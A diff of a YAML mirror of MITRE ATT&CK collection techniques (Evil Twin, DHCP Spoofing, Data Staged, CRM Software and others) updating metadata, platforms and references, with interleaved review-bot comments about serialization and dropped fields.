- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40467,10 +40949,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
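Review bot: in the new T1557.004 object the `(Citation: Australia ‘Evil Twin’)` key inside the description must match its `source_name` byte for byte, and both carry typographic quotes (the `medium evil twin` description likewise contains an em dash); they match as written, so the thing to verify is that the serializer emits UTF-8 without normalizing punctuation, otherwise the citation link breaks silently. `x_mitre_detection: ''` and `atomic_tests: []` are expected for a technique this new. The description's "the adversary may able to monitor" is an upstream typo; leave it rather than patching it locally, since this file mirrors upstream text.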
@@ -40499,7 +41060,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40529,8 +41090,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
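Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1602.002 with no replacement visible in the context, whereas the re-serialized objects elsewhere in the diff carry `x_mitre_attack_spec_version: 3.2.0` after `object_marking_refs`. Confirm the field still exists further up in the object, outside this hunk's context; the same check applies to the T1185 hunk (`@@ -40649,12 +41207,10 @@`), which drops the same two lines.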
@@ -40584,7 +41143,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40621,7 +41179,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40649,12 +41207,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40691,23 +41247,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40740,21 +41296,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -40862,12 +41417,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40878,13 +41432,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40898,6 +41452,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40908,12 +41463,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40958,30 +41513,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -40991,31 +41527,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
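Review bot: `x_mitre_permissions_required` (`- User`) is dropped from T1213.001 without a replacement, and the T1056 hunk further down (`@@ -41382,15 +41933,11 @@`) drops the same field with four values; any index column or report derived from that field will now be empty for these techniques, so confirm nothing consumes it. The remaining changes in the hunk are consistent with an upstream content revision: the bullet now links testing/development credentials to T1552, `x_mitre_version` goes 1.0 to 1.1, and `x_mitre_platforms` / `x_mitre_domains` are relocated, not changed.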
@@ -41048,10 +41601,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41060,16 +41615,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
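Review bot: replacing `Office 365` and `Google Workspace` with `Office Suite` in `x_mitre_platforms` changes which per-platform indexes this technique lands in; any generator that selects techniques by the old platform names will drop T1114.003 from those outputs unless it maps the consolidated name, and the same substitution appears for T1114.002 in `@@ -41316,11 +41869,11 @@`. The version bump to 1.4 and the added `Cloud Service: Cloud Service Metadata` data source are consistent with that upstream platform consolidation, so the index generator, not this data, is what needs checking.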
@@ -41101,70 +41657,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -41237,7 +41789,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -41292,12 +41843,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41309,6 +41859,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -41316,11 +41869,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41337,14 +41890,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -41360,6 +41910,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41368,13 +41919,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41382,15 +41933,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -41401,9 +41948,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
